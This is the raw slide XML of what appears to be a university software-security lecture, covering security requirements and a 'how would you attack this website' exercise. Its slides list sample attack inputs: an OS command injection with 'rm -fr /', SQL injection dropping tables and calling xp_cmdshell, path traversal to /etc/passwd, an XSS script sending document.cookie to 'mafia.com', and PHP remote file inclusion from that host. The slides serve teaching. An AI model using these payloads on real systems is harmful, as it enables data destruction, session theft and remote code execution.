              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34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nl-NL" sz="1800" dirty="0"/>
              <a:t>Hence important security requirements to include are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>doing monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>having logs for auditing and forensics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>having someone actually inspecting the logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>...   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34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GB" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73732" name="Tijdelijke aanduiding voor dianummer 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3A887C6-E699-24FE-84F3-4519B636E7F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4E85A4C9-8466-4FEF-88D9-BB3F9A7B1E80}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL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C67E4CB-F652-FA39-6797-E55BD7CC1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Three kinds of software &amp; security requirements</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="24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1EB66E0-1ECB-7235-AAA6-B13EEEDE4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Security software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e.g. a TLS implementation  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functional correctness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is crucial for security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very clear security goals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="6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Software providing some security-sensitive functionality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e.g. banking app, WhatsApp/Signal, Osiris, Brightspace, ….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security usually involves </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authentication, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, logging &amp; monitoring</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2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Any software 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e.g. graphics library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main (only?) worry is malicious input making that software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> off the rails, because of memory corruption or other standard categories of security bugs </a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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A99B1E-4AC0-6075-8C6F-BA073101C11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19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74719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79803"/>
            <a:ext cx="5867400" cy="4788727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85800" y="276225"/>
            <a:ext cx="7761288" cy="685009"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0"/>
              <a:t>How would you attack this website?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" baseline="-25000" dirty="0">
              <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/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4A9004D-2E4E-45C3-A21A-70BF82E4DD2D}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Rechte verbindingslijn met pijl 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3301997" y="1669733"/>
            <a:ext cx="2779848" cy="212597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8" name="Rechte verbindingslijn met pijl 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2775127" y="3034340"/>
            <a:ext cx="3306718" cy="885367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9" name="Rechte verbindingslijn met pijl 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2987824" y="4165460"/>
            <a:ext cx="3094021" cy="559684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13" name="Rechte verbindingslijn met pijl 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1835696" y="4320532"/>
            <a:ext cx="4320480" cy="764653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25" name="Tekstvak 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151933" y="3674201"/>
            <a:ext cx="1944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Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>INPUT</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Pieces NF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16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99812-645D-024D-A0CA-BBBE5DB11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EA6143-2BB3-D188-AC96-EEC0A3D9F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6226"/>
            <a:ext cx="7761288" cy="496886"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Fun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" baseline="-25000" dirty="0">
                <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t> to try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9355FB-CB39-C20C-4BAC-29FF51E83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190" y="795373"/>
            <a:ext cx="7761288" cy="510416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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ridiculously long inputs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to cause </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buffer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or with  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x%x%x%x%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to trigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> format string attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS command injection     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>erik@ru.nl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; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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rm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 –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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fr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 /</a:t>
            </a:r>
          </a:p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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL injection                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>erik@ru.nl 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’; DROP TABLE Customers;--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                                                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>erik@ru.nl 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’; exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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master.dbo.xp_cmdshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Path traversal   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://company.nl/XYZ123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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etc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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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passwd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                               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://company.nl/XYZ123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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../../../../dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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urandom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         </a:t>
            </a:r>
          </a:p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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDOR (Insecure Direct Object Reference)</a:t>
            </a:r>
          </a:p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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forced Browsing  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://company.nl/XYZ123?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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s000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, 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s001</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.                       </a:t>
            </a:r>
          </a:p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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML injection &amp; XSS   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> via HTML input in the text field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itchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;html&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=”http://a.com/a.jpg” </a:t>
            </a:r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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>width =”999999999” height=”999999999”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                    &lt;html&gt; </a:t>
            </a:r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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt; …; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img.src</a:t>
            </a:r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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =”http://mafia.com/” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or via URL parameter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                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://company.nl/XYZ123/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>index.html?uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=s456&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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&lt;script&gt;...&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF, SSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill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1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>noSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, LDAP, XML, SSI, XXE, OGNL,  … injection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6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6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C735C14-9471-6A6D-518B-433450896BB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21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50073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276226"/>
            <a:ext cx="7761288" cy="496886"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Old-fashioned PHP attacks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73190" y="795373"/>
            <a:ext cx="7761288" cy="510416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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP file injection          	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GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://company.nl/XYZ123/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>index.html?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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../../admin/menu.php%00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="16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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How would you get full Remote Code Execution (RCE)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="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1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP file injection   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to execute a file that the attacker can control       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	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GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://company.nl/XYZ123/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>index.html?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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../../users/john/profile_pic.jpg%00</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1600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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                 </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  PHP file injection          	</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600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b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                   http://company.nl/XYZ123/index.html?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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http://mafia.com/attack.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600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6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6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600" b="1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6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6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22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58004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276226"/>
            <a:ext cx="7761288" cy="496886"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Fun files to upload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11560" y="948928"/>
